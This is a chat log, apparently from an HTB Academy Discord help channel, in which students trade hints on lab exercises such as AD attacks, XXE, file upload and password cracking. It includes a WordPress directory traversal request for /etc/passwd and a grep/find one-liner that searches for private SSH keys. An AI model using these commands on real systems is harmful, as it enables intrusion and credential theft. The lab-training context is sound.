i sent it to me by mail

lol

that's about as dumb as me copying commands between host and VM via shared folder cause my copy paste is broken and I can't find a way to fix it lol

Hello all.

I had a question about the src code of a metasploit exploit used in one of the modules:
https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb

if I understand this correctly, I believe it is making a GET request to this url:
GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../etc/passwd HTTP/1.1

I was curious about the need for line 53 since I was able to perform directory traversal without including that particular query.
I used this instead:
/wp-admin/tools.php?download_backup_file=../../../../../../etc/passwd HTTP/1.1

Thanks!

if you haven't found upload.php, how are you reading source code then?

I would assume it works without line 53 then. looks like that parameter isn't necessary to download a file.
Those modules aren't perfect, so there is a solid chance the parameter just exists because it was in the URL that the creator ended up with for his exploit.

Gotcha.
Thanks for the clarification!

sure thing 🙂

New issue when trying to mount it there

Something go wrong during transfer? md5sum match?

I guess something went wrong

I used this way

switch to binary mode?

Yup

But the md5sum is incorrect yeah

Hi david

That’s a user in the lab 🥲

the lab environment might not support mounting the drives

Got it👍🏼

I was stubborn and just googled hard about how to mount it in linux

Guys i need help

with a module surely

Can yall teach me how to hack a discord servee

no

read #rules and #welcome

and actually read it

this channel is for module discussion for HTB Academy

I just wanted payback

Sorry for disturbing yall

Do I look like I care?

read the rules

This whole server isnt for that kind of stuff anyways. So piss off

Finally 💀😫

hey

On the Upload skill assessment, did you have to figure out how to make the broken upload feature to work?

In my assessment, there is nothing happening after clicking on submit.

umm can you give me a screenshot of what you mean?

ok can i dm?

sure

thanks

hello, stuck on AD Enumeration & Attacks -Skills Assessment Part 2
question: Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
been hunting for a while and don't seem to be getting anywhere, any hints/nudges?

what kind of attacks did you try so far?

secretsdump, snaffler, lazagne, shares enumeration, currently working through powerview
edit: also tried password spraying

||password spraying|| seems like a good idea

can I dm you?

if I remember there's a green button

my instance was completely broken had to restart my pwnbox.
But yes you remember correctly.

Ah sorry wasn't paying attention. I gotta go sleep, but I'll answer tomorrow if ya want

Hey. I'm just getting started and am in the HTTP Fundamentals module, and I have the following "question":
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

I've found the request, but I don't know what header info the question is looking for. I've tried filename, initiator, method.

A flag usually has the format HTB{random_stuff_here}

I see. Thank you.

hello, for active directory enumeration and attacks skills assessment 2 - im struggling with the first question with finding a hash for a user. ive tried some techniques covered in the beginning of the module but had no luck. any tips?

try every technique

lol i wish i knew how to do spoilers to say what ive tried

either way, its always worth trying everything that could be relevant. HTB loves to throw that one small paragraph where it offhand mentions something you can try at ya

that said for assessment 2 its not one of those, its one of the basic obvious things you should try first kind of stuff

so the first question wants us to find a hash for a user so that narrows down some of the techniques to try, at least in my eyes and i cant think of anything else i didnt try. unless i did something wrong

CBBH made me realize my note taking is bad and I need to visually map out everything. I 100% am doing this with CPTS material

its taking me way longer but hopefully stops me from making those misses like @thorn urchin is talking about

hey can i ask you for a nudge on Unrestricted File Upload skill assessment?

No worries, got past it on my own, a little stuck on the sql part but I’m gonna take a break for now, if I have trouble when I pick it up next I’ll probably send you a message lol

BLIND SQL INJECTION - Skills Assessment : Anyone able to give me a hint to find the injection point? I tried sqlmap using the most aggressive settings, on everything, including the cookies and user agent.

Ok, so sqlmap is a bit strange. I had to force it to --dbms "Microsoft SQL Server"

Unrestricted File Upload Skill Assessment:
I have successfully bypassed the filters, the next challenge is to read upload.php. I have tried xxe via svg, but the only thing that I receive back is the base64 encoded payload that we sent.
Can someone give me a hint on what to do here?

I have already tried the xxe payload with php filters.

Currently stuck on the Broken Authentication module - Weak Bruteforce Protections section - on question 2. I've tried using the X-Forwarded-For header and inserting the ||target's ip, server name, and the php/x.x.xx|| but with 0 luck. Used Burp, curl, and even hydra. Any help would be appreciated!

Looking to see if I took notes on this one,

Can you please help me with last question of AD Enum & attacks Part 1, I DMed you

There's just a handful of techniques that allows you get hashes with no account compromise.

@low vine fs lmk

Assuming, you've tried that too. I think I might have a clue where you might have gone wrong in that but, yeah

@lavish needle I reformatted all my notes dont have individual questions / methodologies in here anymore 😦

@low vine haha no worries bro thx anyways!

😰

Mounting that share took me longer than all of the module😂

That’s what I ended up doing as well

Have a NUC at home i rdp into

Made a kali vm and used a shared folder

I'd like to give a big shoutout to @acoustic owl . He is truly outstanding - incredibly helpful and incredibly kind. He is very helpful and I am grateful for his help.

@acoustic owl , he is a great big bro!

hello, in the linux privilege escalation room, cron job abuse room, i found the file which can be edited and runs a cronjob. but where do i find, how that particular cronjob is scheduled?

oh i got it, thanks

https://crontab.guru/

@round gale here you are

thanks!!

@round gale
and this link for linux command explaining, it's good for you, bro
https://explainshell.com/

@round gale and Local Privilege binaries for Linux here
https://gtfobins.github.io/
and windows here
https://lolbas-project.github.io/#

any further tips on this? Tried running it prior to setting breakpoint and still get the same errors you posted above.

Hello im in module Paswords attacks lab-medium i have 2 users ja---- and de--- but i cannot do the privesc somebody can help me?

dw got it now

somebody can help with passwords attacks lab-medium please?

Have a look at the files of user de..... If you look closely, you will find an interesting file, which, how could it be otherwise, you have to crack first.

i have 2 users

jaxxx and dexxx

use the User dexxx

i use it

but i dont know how to do trhe privesc

You need to find a file

This file is the "key“

That's an awesome hint. well done 😄

I must be doing something wrong then. I tried different techniques and tools

Make sure you're aware of the network you're in.

i dont know what file i have to found

Anyone could help me
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. Performed dig on all subdomains (dig any @white rock subdomains) ,Used subbrute on inlanefreight.htb and Whenever I try to do a AXFR transfer it fails. Tried adding subdomains to my hosts file as well but still doesnt work

Usually, there are two ways to authenticate as a user

a password an id_rsa

So you zone transferred inlanefreight.htb and then subbrute on the subdomains?

yes

ANY is not the best idea
https://blog.cloudflare.com/deprecating-dns-any-meta-query-type/

And where did your zone transfer fail?

; <<>> DiG 9.18.12-1-Debian <<>> axfr inlanefreight.htb @10.129.203.6
;; global options: +cmd
; Transfer failed.```

Have you ever looked if this file exists?

Now I wish I had notes on this but I thought that zone transfer should work. I'll check in a minute

Remember that you can configure zones to allow zonetransfer only from certain servers.

i search this grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" and this find / -name *id_rsa* 2>/dev/null but only is the id_rsa of dexxx user

Afaik any is taught in the module. Might wanna write an erratum

What do you expect from adding a subdomain to your hostsfile?
What exactly does the hosts file do?

ANY can work, but depends on the configuration

Fair

are you sure?

Private keys in the .ssh directory are usually used to log in as another user somewhere. Right?

did smn complete documentation & Reporting skills assessment??

Currently, 390 people have completed this module.

got it!

very little group of people actually

this must be smth medium considering skills assessment, it is not easy tho

There are modules where there are even fewer people

I am guessing it is AD & Password attacks 😄

how do you see how many users have a badge?

Broken Auth in CBBH path made me want to cry

Note taking is important. taking good notes has helped me a lot already so I will definitely take this module 🙂

this module freaking me out can you give another hint, I fell like useless shit but anyway I have to complete it

just tested. looks good and should work

AD Enum & Attacks 652
Password Attacks: 982

not much either

If you want to share the badge, you will get a link. Open it

Whats the total on CPTS passes so far is it still under 100?

It is actually good to know how many CPTS certs are earned so far

is there any source to check it?

I gotta get the CPTS next, feel very behind on AD / my AD abilities

Crying does not help 😉

😄

I shed tears it took me like 4 days of throwing a tantrum

can you give a hint on skills assessment pls, Documentation & Reporting three dayys straight in a row, and not anything out of it

Sure, send me a DM

can yo do this wit cbbh?

I was trying to find it i only see the cert

No, only with the Badges

got it

^ i'm looking now wheree do you find that one?

https://academy.hackthebox.com/my-badges

weird thats exactly what im looking at lol

not quite, click on "Get a shareable link" below the buttons

solid thanks

157

I was like wtf am i missing lol

Damn I was 142 about a month ago

If you tell us here what brings tears to your eyes or gives you tantrums, we might be able to help you.

Well when I walk back through that modules and relive that pain I'll come here

but for now.......we not back on it yet

Do we get a live ticker then? 😛

The numbers of the badges are not live numbers. No idea how often the numbers are adjusted. Once a day?

can you check your dm pls

nah I meant for when Roll For Combat relives his pain

I know that it doesn't update that often

Ill have to look at CPTS path hold up

cause i feel like ive lost it all lol I'd say 1.5 months

it says, unable to send msgs btw, I guess bc you set some certain rules

I have received your message.

Can someone help me with:

• Web Attacks: Blind Data Exfiltration (XXE)

I currently have this, but it is not giving me any response...

Sure.. let's make it simple.. DM's pls

What is in the index.php file?
Port 8000 on your machine

Oh, Simple was faster

The php they provide in the section

is your php server started in the same directory as the xxe.dtd file, and does it include the index.php

^

Got it !

Does anybody have a recommended resource to keep learning about Active Directory after doing the "Introduction to Active Directory" module?
That module left me with more questions than answers

I am on the getting started module trying to run an nmap scan on the web server in the Public Exploits section. It comes back saying the host is down. Is this correct??

https://twitter.com/hackthebox_eu/status/1529122562038456320?s=61

good morning friends 😊 at Password Attacks Lab - Medium can i get a hint how to interact with the service on the host, since the port is closed i cant use hydra and i dont think i can use http://localhost:####/

maybe http://targetip/####/ ?

i tried that 😅 let me check again

i can't recall a step that has http in it for that lab

Thx

Are you connected to the VPN?

it didnt work

its not http, but another service in the doc file

if the port is not up, then you are looking at the wrong thing

there is something that stands out and can be used

its not working 😅 i am already at j****** user, i searched for everything, history, conf files, scripts and nothing there, so i am almost sure its something else in the document, but the service mentioned there is not running

Maybe you need to access the service locally 😉

i already did it but was using uppercase 🤦 its always the simple mistakes

thank you so much 🥰

question before I dive into the rabbit hole do I need to get a windows virtual machine to mount the drive on password attacks - hard

nvm found info

Hi I’m a student in HTB academy Im wondering If it’s important to subscribe in HTB lab or machines to Improve my skills when finished module or waiting when finish cpts path ?

Ger the subscription once you have got to the 'nibbles' part of the second module

so I’m late 🥲 I will activate my subscription and start with machine include subject in our module finish

password attacks - hard down was a great machine did not enjoy the curve ball I got thrown at the end though haha

Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: RDP and SOCKS Tunneling with SocksOverRDP
https://academy.hackthebox.com/module/158/section/1439
I have been able to set up port forwarding from the attacker host to the pivot host then to victor's host, but when I tried to connect to jason's host the connection always reset. The hint says that jason is a local user and there might be a defender. Any hint to bypass the defender?

Would someone be able to provide me a sanity check or a nudge for: Web-Attacks, Blind Data Exfiltration? I'm able to get the server to request the DTD I'm hosting, however, I can never get the flag contents. I've also tried to get the contents from /etc/passwd, but can't get that to dump either. I've cross checked what I'm doing with portswigger and a few other write-ups on OOB-XXE and I'm not sure what I'm doing wrong at this point

it's depend on you and the prolabs on HTB are super good for learning AD (no idea about web stuff if that's what you're looking for)

i don't think there is defender on jason box but there is on victor and you can just disable that

hint ||base64|| or if you already done that and still need help shoot me a dm

anyone familiar what service i should use ? https://academy.hackthebox.com/module/112/section/1078

floofd?

yes?

can u help ?

uhhh, I was just about to ask for help myself (session hijacking chapter in the xss module, the server connects but the cookie it submits is always empty), what is the problem?